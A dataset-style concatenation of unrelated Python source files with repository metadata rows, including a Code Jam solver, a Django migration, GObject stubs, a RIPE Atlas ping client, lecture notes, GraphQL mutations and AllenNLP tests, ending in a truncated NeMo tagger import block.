print 'Case #1:'
for r in xrange(R):
    numset = map(int, raw_input().split())
    possible = []
    must = []
    # Products with a unique factorization are certain ("must");
    # ambiguous ones are merely "possible".
    for num in numset:
        if num in products:
            blah = products[num]
            if len(blah) == 1:
                must += blah
            else:
                possible += blah
    must.sort(key=lambda x:-len(x))  # longest certain strings first
    possible.sort(key=len)
    result = None
    # Try to assemble an exactly-N-digit answer from a certain string,
    # topped up by one more certain or possible string.
    for maybe in must:
        if len(maybe) == N:
            result = maybe
            break
        done = len(maybe)
        for rest in must:
            if len(rest) == N - done:
                result = maybe + rest
                break
        for rest in possible:
            if len(rest) == N - done:
                result = maybe + rest
                break
    else:
        # Fallback over the ambiguous candidates ('222' is the
        # last-resort guess). NOTE(review): this else clause also runs
        # when the loop above assigned result via maybe+rest without
        # break-ing, overwriting that assembled result.
        counts = {}
        for rest in possible:
            if rest not in counts:
                counts[rest] = 0
            counts[rest] += 1
        count_list = sorted(counts.items(), key=lambda x:x[1])
        if count_list:
            result = count_list[0][0]
        else:
            result = '222'
        done = False
        if len(result) == N:
            done = True
        if not done:
            for thing in count_list:
                if len(result) + len(thing[0]) == N:
                    result = result + thing[0]
                    done = True
                    break
            else:
                result = '222'
    if result is None:
        result = '222'
    print result
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
59da0441dfdae546f6978a77dfa30809a9f016a4 | 3b604fe8f03f25859991cdab37804bcda51a4f18 | /dublyou/apps/competitions/migrations/0021_auto_20170208_1327.py | c209926f116eddd90b1a739362c65439c98c3d97 | [] | no_license | dublyou/matchup-games | e6238cbca7c30c6d4b4ddd161b84dfd5cc1bbacd | 07b2db2e7d52ac6590ab55a1a05e6076d8c9d680 | refs/heads/master | 2020-03-11T11:10:10.506719 | 2018-04-17T20:41:30 | 2018-04-17T20:41:30 | 129,956,203 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-02-08 19:27
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: enforce one MatchupCompetitor row per
    (matchup, competitor) pair via a unique_together constraint."""

    dependencies = [
        ('competitions', '0020_auto_20170208_1326'),
    ]

    operations = [
        migrations.AlterUniqueTogether(
            name='matchupcompetitor',
            unique_together=set([('matchup', 'competitor')]),
        ),
    ]
| [
"jgriff@Calebs-MacBook-Pro.local"
] | jgriff@Calebs-MacBook-Pro.local |
38858d47bfbc0f344c5abb3b33b16dce0d4a44ba | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/AppStreamGlib/BundleClass.py | fff38c1582b8c4b940d7ee23fbf282772b0e6321 | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 5,784 | py | # encoding: utf-8
# module gi.repository.AppStreamGlib
# from /usr/lib64/girepository-1.0/AppStreamGlib-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gobject as __gobject
class BundleClass(__gi.Struct):
"""
:Constructors:
::
BundleClass()
"""
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self): # real signature unknown; restored from __doc__
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
parent_class = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved1 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved2 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved3 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved4 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved5 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved6 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved7 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
_as_reserved8 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(BundleClass), '__module__': 'gi.repository.AppStreamGlib', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'BundleClass' objects>, '__weakref__': <attribute '__weakref__' of 'BundleClass' objects>, '__doc__': None, 'parent_class': <property object at 0x7f274165ff40>, '_as_reserved1': <property object at 0x7f2741660090>, '_as_reserved2': <property object at 0x7f2741660180>, '_as_reserved3': <property object at 0x7f2741660270>, '_as_reserved4': <property object at 0x7f2741660360>, '_as_reserved5': <property object at 0x7f2741660450>, '_as_reserved6': <property object at 0x7f2741660540>, '_as_reserved7': <property object at 0x7f2741660630>, '_as_reserved8': <property object at 0x7f2741660720>})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(BundleClass)
| [
"ttys3@outlook.com"
] | ttys3@outlook.com |
31aa1f2ab88183a3c6820e7325e5564f79a2bf2a | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2/numberMumbler/pancakes.py | 9e56f0b9a08a2b46aec3e868ba27265b17453014 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,521 | py | #!/usr/bin/env python
import sys
# Per-case output line for the judge: "Case #<case>: <answer>".
__outputTemplate = 'Case #{0}: {1}\n'
def flip(pancakes):
    """Turn an entire stack over: reverse the order and invert each pancake."""
    flipped = []
    for pancake in reversed(pancakes):
        flipped.append(not pancake)
    return flipped
def flipAfter(stack, i):
    """Flip only the top of the stack (positions 0..i inclusive).

    The flipped prefix is reversed with every pancake inverted — the same
    transformation the sibling ``flip`` helper applies to a whole stack —
    and the remainder of the stack is left untouched.
    """
    turned_top = [not pancake for pancake in reversed(stack[:i + 1])]
    return turned_top + stack[i + 1:]
def flipPoint(stack):
    """Return the index ending the leading run of same-orientation pancakes.

    Scans adjacent pairs and returns the first position whose neighbour
    differs; a uniform (or single-element) stack yields its last index,
    and an empty stack yields -1.
    """
    for index, (current, following) in enumerate(zip(stack, stack[1:])):
        if current != following:
            return index
    return len(stack) - 1
def minimumFlips(stack, verbose=False):
    """Count the greedy flips needed until every pancake is True (happy side up).

    Repeatedly flips the stack at ``flipPoint`` until ``all(stack)`` holds.
    NOTE(review): the loop is capped at ``len(stack)`` flips; confirm that
    bound is always sufficient for this puzzle's inputs.
    """
    maxFlips = len(stack)
    flips = 0
    while flips < maxFlips and not all(stack):
        flips += 1
        if verbose:
            print('start stack: {}'.format(stack))
        i = flipPoint(stack)  # boundary of the leading uniform run
        if verbose:
            print('flip at: {}'.format(i))
        if i >= 0:
            # flipAfter returns a new list, so the caller's stack is not mutated.
            stack = flipAfter(stack, i)
        if verbose:
            print('end stack: {}'.format(stack))
    return flips
def stringToStack(s):
    """Decode one '+'/'-' input line into booleans (True means '+')."""
    decoded = []
    for symbol in s.strip():
        decoded.append(symbol == '+')
    return decoded
def action(inFile, outFile):
    """Solve every case read from ``inFile`` and write answers to ``outFile``.

    The first input line is the declared case count ``t``; every following
    line describes one pancake stack.  Output uses the module-level template.
    """
    case = 0
    t = int(inFile.readline())
    for line in inFile.readlines():
        case += 1
        # Guard against the file containing more data lines than declared.
        assert case <= t
        x = stringToStack(line)
        result = minimumFlips(x)
        outFile.write(__outputTemplate.format(case, result))
def main():
    """
    command line arguments are:
        input path
        output path (will overwrite existing)
    """
    # Exactly two user arguments are required (argv[0] is the script itself).
    assert len(sys.argv) == 3
    inputPath, outputPath = sys.argv[1:3]
    # 'w+' truncates any existing output file before writing.
    with open(inputPath, 'r') as inFile:
        with open(outputPath, 'w+') as outFile:
            action(inFile, outFile)


if __name__ == '__main__':
    main()
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
d8f9c8c7ac57c4d2f0c1d2537727eab4815a6813 | 5d5a2511fd5f408437265a3bd94529730f4f357e | /latency/lib/atlasclient.py | 7b80a080a13f1efff3f8b017861849e903cb19d4 | [] | no_license | wwwiretap/atlas | 50f89006c6adec146c8e6039531610ba97e34185 | 409daba5e08c1b089580c81531fdf848376e1e90 | refs/heads/master | 2022-04-20T16:42:12.348475 | 2020-04-14T14:25:11 | 2020-04-14T14:25:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,280 | py | from datetime import datetime
import time
from ripe.atlas.cousteau import (
AtlasSource,
AtlasStream,
AtlasCreateRequest,
AtlasLatestRequest,
# Measurement,
Ping
)
import urllib.request
from urllib.error import HTTPError, URLError
import json
class AtlasClient:
    """Creates RIPE Atlas ping measurements and collects their results.

    For each work item handed to :meth:`do`, the client makes sure a
    measurement from ``args.src_probe`` to the target probe exists, waits
    for its result, and records both through the results manager.  All
    network access goes through the Cousteau library and the public Atlas
    REST API.
    """

    def __init__(self, args, log, results_manager):
        self._args = args
        self._log = log
        self._results_manager = results_manager

    def _create_measurement_impl(self, target_probe):
        """Create a one-off IPv4 ping to ``target_probe``.

        Returns the new measurement id, or None when the probe lacks an
        IPv4 address or the Atlas API rejects the request.
        """
        args = self._args
        log = self._log
        probe = target_probe
        if 'address_v4' not in probe:
            log.error('probe has no ipv4 addr')
            return None
        target_id = probe['id']
        target_ip = probe['address_v4']
        log.notice('Creating measurement to probe', target_id, target_ip)
        desc = '{} {} to {}'.format(args.test_name_prefix, args.src_probe, target_id)
        ping = Ping(af=4, target=target_ip, description=desc)
        source = AtlasSource(type='probes', value='{}'.format(args.src_probe),
                             requested=1)
        req = AtlasCreateRequest(
            # Atlas expects naive UTC timestamps here.
            start_time=datetime.utcnow(),
            key=args.api,
            measurements=[ping],
            sources=[source],
            is_oneoff=True
        )
        is_success, resp = req.create()
        if not is_success:
            log.warn('Error creating measurement:', str(resp))
            return None
        return resp['measurements'][0]

    def _get_measurement_status(self, msm_id):
        """Fetch the latest results for ``msm_id``; None on API failure."""
        assert msm_id
        req = AtlasLatestRequest(msm_id=msm_id)
        is_success, results = req.create()
        if not is_success:
            self._log.warn('Fetching status of', msm_id, 'was not successful.',
                           results)
            return None
        return results

    def do(self, item):
        """Ensure ``item['probe']`` has both a measurement and a result.

        Creates the measurement if missing, fetches its result, and — when
        this call had to create the measurement — blocks until Atlas marks
        it stopped so the one-off is fully finished before returning.
        """
        rm = self._results_manager
        log = self._log
        had_to_create_msm = False
        probe = item['probe']
        if 'id' not in probe:
            log.error('probe without ID???')
            return None
        if 'address_v4' not in probe:
            log.error('probe without ipv4 address???')
            return None
        if not rm.have_measurement_for_probe(probe['id']):
            log('No measurement for probe', probe['id'], 'yet')
            self._create_measurement(probe)
            had_to_create_msm = True
        if not rm.have_measurement_for_probe(probe['id']):
            log.warn('Unable to make measurement to probe', probe['id'])
            return
        msm_id = int(rm.get_measurement_for_probe(probe['id']))
        log.info('Have msm', msm_id, 'for probe', probe['id'])
        if not rm.have_result_for_probe(probe['id']):
            log.debug('Fetching result for msm', msm_id)
            self._wait_for_result(probe, msm_id)
        if not rm.have_result_for_probe(probe['id']):
            log.warn('Unable to fetch result for probe', probe['id'])
            return
        log.notice('Have result for msm', msm_id)
        if had_to_create_msm:
            self._wait_for_measurement_to_complete(msm_id)

    def _create_measurement(self, probe):
        """Try up to ``args.msm_attempts`` times to create a measurement.

        Sleeps 60 seconds between failed attempts; on success the new id is
        recorded with the results manager and returned (None if all fail).
        """
        self._log.debug('Called with probe', probe['id'])
        prb_id = probe['id']
        for _ in range(0, self._args.msm_attempts):
            msm_id = self._create_measurement_impl(probe)
            if not msm_id:
                time.sleep(60)
                continue
            self._results_manager.recv_measurement(prb_id, msm_id)
            return msm_id
        return None

    def _wait_for_result(self, probe, msm_id):
        """Poll for a result every 10s, up to ``args.msm_result_timeout`` seconds.

        A received result is recorded with the results manager and returned;
        returns None on timeout.
        """
        args = self._args
        log = self._log
        prb_id = probe['id']
        result = None
        timeout = time.time() + args.msm_result_timeout
        while time.time() < timeout:
            result = self._get_measurement_status(msm_id)
            if result:
                break
            log.debug('Waiting for result for msm', msm_id, '...')
            time.sleep(10)
        if not result:
            log.warn('Didn\'t get a result')
        else:
            log.debug('Got result for msm', msm_id)
            self._results_manager.recv_result(prb_id, msm_id, result)
        return result

    def _wait_for_measurement_to_complete(self, msm_id):
        """Block until the Atlas API reports a ``stop_time`` for ``msm_id``.

        HTTP errors abort the wait; transient URL errors are retried
        indefinitely with a short sleep.
        """
        log = self._log
        atlas_url = 'https://atlas.ripe.net/api/v2/measurements/{}/'.format(msm_id)
        while True:
            try:
                req = urllib.request.urlopen(atlas_url)
            except HTTPError:
                log.warn('Got an HTTP error trying to fetch msm', msm_id,
                         'so we aren\'t going to wait for it to finish')
                break
            except URLError as e:
                log.warn(e, 'but will try again to wait until msm is stopped')
                time.sleep(10)
            else:
                j = json.loads(req.read().decode('utf-8'))
                if j['stop_time']:
                    log.info('msm', msm_id, 'is considered done')
                    break
                log.debug('Still waiting on msm', msm_id, 'to be done ...')
                time.sleep(30)
        return
| [
"sirmatt@ksu.edu"
] | sirmatt@ksu.edu |
a7fba9ff5e2ef35f0c5b1435cd717b762c34ce13 | 622183f2069a84508e87d0ceebfd203d0ec9332a | /notes/07-03.py | 60681b0e07c2f2ae5b0f36b0649ae51a8b70f3de | [] | no_license | kasrasadeghi/cs373 | f4ff92fa8c472242fe9df10f6d5a022cba6fcdd9 | 7036f22db3e2830bf79395a3aef3c7bed4e58887 | refs/heads/master | 2021-01-01T18:23:57.473050 | 2017-07-25T15:58:55 | 2017-07-25T15:58:55 | 98,325,040 | 0 | 0 | null | 2017-07-25T15:59:32 | 2017-07-25T15:59:32 | null | UTF-8 | Python | false | false | 2,077 | py | # -----------
# Mon, 3 Jul
# -----------
"""
Java has 4 access directives
public
protected: descendents and package
private
nothing: package
class A {
private static int _ci;
private int _i;
public A (...) {
...}}
class T {
public static void main (...) {
s.o.p(A._i); // not ok
s.o.p(A._ci);
x = new A(...);
s.o.p(x._i);
s.o.p(x._ci); // yes, but odd
Java has a closed object model
instances have the same footprint over time
        different instances have the same footprint
Python has an open object model
instances don't have the same footprint over time
        different instances don't have the same footprint
"""
class A:
    """Demo class for the open-object-model example: one instance attribute."""

    def __init__(self):
        self.velocity = 2
x = A()
print(x.velocity)  # 2

# Open object model: a brand-new attribute can be attached after construction.
x.velocityy = 3

# Illustrative scratch from the lecture: Ellipsis is literally passed as an argument.
a = [A(...), A(...), A(...)]
# NOTE(review): A defines no attribute 'im'; this line would raise at runtime.
m = map(A.im, a)
"""
relational algebra is an algebra
algebra
set of elements
set of operations
integer
-3, 2, 5, 0, ...
+, -, /, *, ...
are algebras closed or open
integers over addition: closed
integers over multiplication: closed
integers over division: open
relational algebra
relations, tuples, tables with rows
select, project, join (several kinds)
movie table
title year director genre
shane 1953 george stevens western
star wars 1977 george lucas western
select
relation
unary predicate (unary function that returns a bool)
"""
# Illustrative relational-algebra call from the notes; 'movie', 'select' and
# 'year' are not defined at this point, so this line is for reading, not running.
select (movie, lambda r : year > 1970)
# Two sample rows of the movie relation.  The original notes were missing the
# comma between the rows, which made the literal an indexing expression
# (list indexed by a list -> TypeError at runtime) instead of a two-row table.
x = [["shane", 1953, "george stevens", "western"],
     ["star wars", 1977, "george lucas", "western"]]
# Three equivalent implementations of relational-algebra select, shown as the
# lecture's progression of idioms.  Each redefinition replaces the previous one.
# NOTE(review): the parameter name 'callable' shadows the builtin of the same name.
def select (iterable, callable) :
    """v1: explicit generator function with a yield."""
    for i in iterable :
        if callable(i) :
            yield i

def select (iterable, callable) :
    """v2: the same select as a generator expression."""
    return (i for i in iterable if callable(i))

def select (iterable, callable) :
    """v3: the same select via the built-in filter()."""
    return filter(callable, iterable)
# ---------
# Questions
# ---------
"""
What is a closed/open object model? Which language has which?
What is a closed/open algebra?
What data structure in Python can mimic a relation?
What is select()?
What is project()?
"""
| [
"downing@cs.utexas.edu"
] | downing@cs.utexas.edu |
5d2b249842e4c8208f1359651391dcf5dffdf187 | 41063557c9a004ca49077c6042bba3cb8521e853 | /jobsapp/graphql/sub_mutations.py | 9de270f6dd14ce1679d3bb8056d116c405d2c5aa | [
"MIT"
] | permissive | manjurulhoque/django-job-portal | d71c17741cdb69fb7df49e20533a0c2e1e8ed2f1 | 01f2b7f77511e99cd5e6286ffa1abf36688f486c | refs/heads/master | 2023-08-03T01:01:52.878771 | 2023-07-24T07:40:06 | 2023-07-24T10:46:59 | 180,424,218 | 497 | 211 | MIT | 2023-09-02T10:13:37 | 2019-04-09T18:12:52 | Python | UTF-8 | Python | false | false | 1,722 | py | import graphene
from jobsapp.graphql.graphql_mixins import (
DynamicArgsMixin,
MutationMixin,
CreateNewJobMixin,
UpdateJobMixin,
SingleObjectMixin,
)
from jobsapp.graphql.input_types import TagInput
from jobsapp.graphql.permissions import IsAuthenticated, IsEmployer
from graphene.types import Int
from jobsapp.graphql.types import JobGQLType
from jobsapp.models import Job
# GraphQL mutation that lets an authenticated employer post a new job.
# Field declarations come from _required_args (consumed by DynamicArgsMixin);
# the actual creation logic lives in CreateNewJobMixin.
class CreateNewJob(MutationMixin, DynamicArgsMixin, CreateNewJobMixin, graphene.Mutation):
    # Expose the mixin's documentation as this mutation's description.
    __doc__ = CreateNewJobMixin.__doc__

    # Every scalar field below is mandatory for this mutation.
    _required_args = {
        "title": "String",
        "description": "String",
        "location": "String",
        "type": "String",
        "category": "String",
        "last_date": "String",
        "company_name": "String",
        "company_description": "String",
        "website": "String",
        "salary": "Int",
    }
    permission_classes = [IsAuthenticated, IsEmployer]

    class Arguments:
        # Primary keys of the tags to attach to the new job.
        tags = graphene.List(Int, required=True)
# GraphQL mutation for an employer to update one of their existing jobs.
class UpdateJob(MutationMixin, DynamicArgsMixin, SingleObjectMixin, UpdateJobMixin, graphene.Mutation):
    # The updated job is returned so clients can refresh their view of it.
    job = graphene.Field(JobGQLType)

    # Expose the mixin's documentation as this mutation's description.
    __doc__ = UpdateJobMixin.__doc__

    # Only the primary key is mandatory; every other field is optional.
    _required_args = {"pk": "ID"}
    _args = {
        "title": "String",
        "description": "String",
        "location": "String",
        "type": "String",
        "category": "String",
        "last_date": "String",
        "company_name": "String",
        "company_description": "String",
        "website": "String",
        "salary": "Int",
    }

    class Arguments:
        tags = graphene.List(Int, required=False)

    permission_classes = [IsAuthenticated, IsEmployer]
    model = Job
    # NOTE(review): object-level permission checking is disabled here —
    # confirm job ownership is enforced elsewhere before update.
    check_object_level_permission: bool = False
| [
"rumimanzurulhoque@gmail.com"
] | rumimanzurulhoque@gmail.com |
9f426550c3767ef67dac51e54f6d0d7937baeae8 | e2e188297b0ef47f0e7e935290f3b7a175376f8f | /contact_form/views.py | becd3867b41ead2c81f7b00bb2a8d6edaa837672 | [] | no_license | shubham1560/contact-us-backend | 77b615021f0db2a48444424a654cf3c61522c7d8 | c7ef2d3024ab3f3b6f077648d6f6f5357f01eebc | refs/heads/master | 2022-12-30T13:05:00.950702 | 2020-10-02T19:47:19 | 2020-10-02T19:47:19 | 296,075,868 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,041 | py | from django_countries import Countries
from rest_framework.permissions import IsAuthenticated
from rest_framework.views import APIView
from rest_framework import serializers, status
from .models import ContactForm
from rest_framework.response import Response
from .services import insert_contact_data, get_related_forms_records, get_preference_array, change_field_value,\
get_contact_form_count, delete_mass_contact_form
from domain_preference.models import DomainPreference
# Create your views here.
class SerializableCountryField(serializers.ChoiceField):
    """ChoiceField over the django-countries list whose empty value is
    serialized as '' instead of a non-serializable Country('') object."""

    def __init__(self, **kwargs):
        # NOTE(review): **kwargs are accepted but not forwarded to the parent
        # constructor — confirm that is intentional.
        super(SerializableCountryField, self).__init__(choices=Countries())

    def to_representation(self, value):
        if value in ('', None):
            return ''  # normally this would return value, which is Country(u'') and not serializable
        return super(SerializableCountryField, self).to_representation(value)
class ContactUsListView(APIView):
    """Paginated listing of contact-form submissions for the requesting user.

    ``start`` is the result offset; ``message_type`` selects the filter
    (per the inline comment: all / important / start / read / unread).
    The page size comes from the caller's DomainPreference ``window``,
    falling back to 50 when no preference exists.
    """
    permission_classes = (IsAuthenticated, )
    # NOTE(review): a serializer field as a class attribute on an APIView is
    # unusual and is never referenced in this class — confirm it is needed.
    country = SerializableCountryField(allow_blank=True)

    class ContactUsFormSerializer(serializers.ModelSerializer):
        class Meta:
            model = ContactForm
            fields = ('id', 'first_name', 'last_name',
                      'name', 'email', 'subject', 'message', 'anything_else',
                      'phone_number', 'sys_created_on', 'important', 'read', 'starred')

    class DomainPreferenceSerializer(serializers.ModelSerializer):
        class Meta:
            model = DomainPreference
            fields = ('id', 'first_name', 'last_name', 'name', 'email', 'subject',
                      'message', 'anything_else', 'phone_number', 'window')

    def get(self, request, start, message_type, format=None):
        """Return {"list": page, "preference": prefs, "row_count": total}."""
        domain_preference = get_preference_array(request)
        preference = self.DomainPreferenceSerializer(domain_preference, many=True)
        # message_type can be all, important, start, read, unread
        # breakpoint()
        if preference.data:
            # Page size ("window") is taken from the first preference row.
            end = start+preference.data[0]['window']
        else:
            end = 50  # fallback page size when no preference exists
        contacts_data = get_related_forms_records(request, start, end, message_type)
        result = self.ContactUsFormSerializer(contacts_data, many=True)
        row_count = get_contact_form_count(request, message_type)
        # breakpoint()
        response = {
            "list": result.data,
            "preference": preference.data,
            "row_count": row_count
        }
        return Response(response, status=status.HTTP_200_OK)

    # def post(self, request, format=None):
    #     insert_contact_data(request)
    #     return Response('Inserted data', status=status.HTTP_201_CREATED)
    #     # pass
class ContactUsPostView(APIView):
    """Public endpoint that external sites call to submit a contact form.

    Authentication is deliberately disabled (see the commented-out
    permission_classes); callers appear to be identified by an API key
    resolved inside ``insert_contact_data``.
    """
    # permission_classes = (IsAuthenticated, )
    country = SerializableCountryField(allow_blank=True)

    class ContactUsFormSerializer(serializers.ModelSerializer):
        class Meta:
            model = ContactForm
            fields = ('id', 'first_name', 'last_name',
                      'country', 'name', 'email', 'subject', 'message', 'anything_else',
                      'domain', 'domain_path')

    def post(self, request, format=None):
        # breakpoint()
        # "Default" is the sentinel insert_contact_data returns for an
        # unrecognised API key.
        in_domain = insert_contact_data(request)
        if in_domain == "Default":
            message = "Wrong api key, please check the key in dashboard!"
            # status = status.
        else:
            message = "Successful integration"
        # NOTE(review): HTTP 201 is returned even for the wrong-api-key case —
        # confirm whether an error status would be more appropriate.
        return Response(message, status=status.HTTP_201_CREATED)
class ContactUsChangeView(APIView):
    """Update a single field on a contact-form record.

    Delegates entirely to ``change_field_value``; presumably this flips the
    read/starred/important flags the list view exposes — confirm in services.
    """
    permission_classes = (IsAuthenticated, )

    def post(self, request, format=None):
        result = change_field_value(request)
        return Response(result, status=status.HTTP_201_CREATED)
    # pass
class ContactUsFormBulkDelete(APIView):
    """Bulk-delete contact-form records; delegates to ``delete_mass_contact_form``."""
    permission_classes = (IsAuthenticated, )

    def post(self, request, format=None):
        result = delete_mass_contact_form(request)
        return Response(result, status=status.HTTP_200_OK)
| [
"shubhamsinha2050@gmail.com"
] | shubhamsinha2050@gmail.com |
d622a74280f26b8cdea5b8e0085fb5ccdde31172 | 234c46d1249c9209f268417a19018afc12e378b4 | /tests/data/instance_test.py | 73e85d9f649992b50ec46216aed782120454611e | [
"Apache-2.0"
] | permissive | allenai/allennlp | 1f4bcddcb6f5ce60c7ef03a9a3cd6a38bdb987cf | 80fb6061e568cb9d6ab5d45b661e86eb61b92c82 | refs/heads/main | 2023-07-07T11:43:33.781690 | 2022-11-22T00:42:46 | 2022-11-22T00:42:46 | 91,356,408 | 12,257 | 2,712 | Apache-2.0 | 2022-11-22T00:42:47 | 2017-05-15T15:52:41 | Python | UTF-8 | Python | false | false | 2,588 | py | import numpy
from allennlp.common.testing import AllenNlpTestCase
from allennlp.data import Instance
from allennlp.data.fields import TextField, LabelField, TensorField
from allennlp.data.token_indexers import PretrainedTransformerIndexer
from allennlp.data.tokenizers import Token
class TestInstance(AllenNlpTestCase):
    def test_instance_implements_mutable_mapping(self):
        """Instance supports dict-style access, len(), and items()."""
        words_field = TextField([Token("hello")], {})
        label_field = LabelField(1, skip_indexing=True)
        instance = Instance({"words": words_field, "labels": label_field})

        assert instance["words"] == words_field
        assert instance["labels"] == label_field
        assert len(instance) == 2

        keys = {k for k, v in instance.items()}
        assert keys == {"words", "labels"}

        values = [v for k, v in instance.items()]
        assert words_field in values
        assert label_field in values

    def test_duplicate(self):
        # Verify the `duplicate()` method works with a `PretrainedTransformerIndexer` in
        # a `TextField`. See https://github.com/allenai/allennlp/issues/4270.
        instance = Instance(
            {
                "words": TextField(
                    [Token("hello")], {"tokens": PretrainedTransformerIndexer("bert-base-uncased")}
                )
            }
        )
        other = instance.duplicate()
        assert other == instance

        # Adding new fields to the original instance should not affect the duplicate.
        instance.add_field("labels", LabelField("some_label"))
        assert "labels" not in other.fields
        assert other != instance  # sanity check on the '__eq__' method.

    def test_human_readable_repr(self):
        """human_readable_dict() summarises fields; tensors become shape/stat dicts."""
        words_field = TextField([Token("hello")], {})
        label_field = LabelField(1, skip_indexing=True)
        instance1 = Instance({"words": words_field, "labels": label_field})
        assert type(instance1.human_readable_dict()) is dict
        assert instance1.human_readable_dict() == {"words": ["hello"], "labels": 1}
        instance1_human_readable_dict = instance1.human_readable_dict()
        array = TensorField(numpy.asarray([1.0, 1, 1]))
        # Expected summary for the tensor field: shape plus element statistics.
        array_human_readable_dict = {
            "shape": [3],
            "element_mean": 1.0,
            "element_std": 0,
            "type": "float64",
        }
        instance2 = Instance({"words": words_field, "labels": label_field, "tensor": array})
        instance1_human_readable_dict["tensor"] = array_human_readable_dict
        assert instance1_human_readable_dict == instance2.human_readable_dict()
| [
"noreply@github.com"
] | allenai.noreply@github.com |
929a08ae553a84c21973df60cd0d91dc9e526d53 | 2bf43e862b432d44ba545beea4e67e3e086c1a1c | /nemo_text_processing/text_normalization/en/taggers/word.py | fa6a965aab2e4d802e2bfd8d001356c128d04cb5 | [
"Apache-2.0"
] | permissive | ericharper/NeMo | 719e933f6ffce1b27358bc21efe87cdf144db875 | f1825bc4b724b78c2d6ca392b616e8dc9a8cde04 | refs/heads/master | 2022-10-06T01:45:21.887856 | 2022-09-14T19:09:42 | 2022-09-14T19:09:42 | 259,380,135 | 1 | 0 | Apache-2.0 | 2022-09-20T18:01:57 | 2020-04-27T15:54:20 | Python | UTF-8 | Python | false | false | 3,999 | py | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pynini
from nemo_text_processing.text_normalization.en.graph_utils import (
MIN_NEG_WEIGHT,
NEMO_ALPHA,
NEMO_DIGIT,
NEMO_NOT_SPACE,
NEMO_SIGMA,
GraphFst,
convert_space,
get_abs_path,
)
from nemo_text_processing.text_normalization.en.taggers.punctuation import PunctuationFst
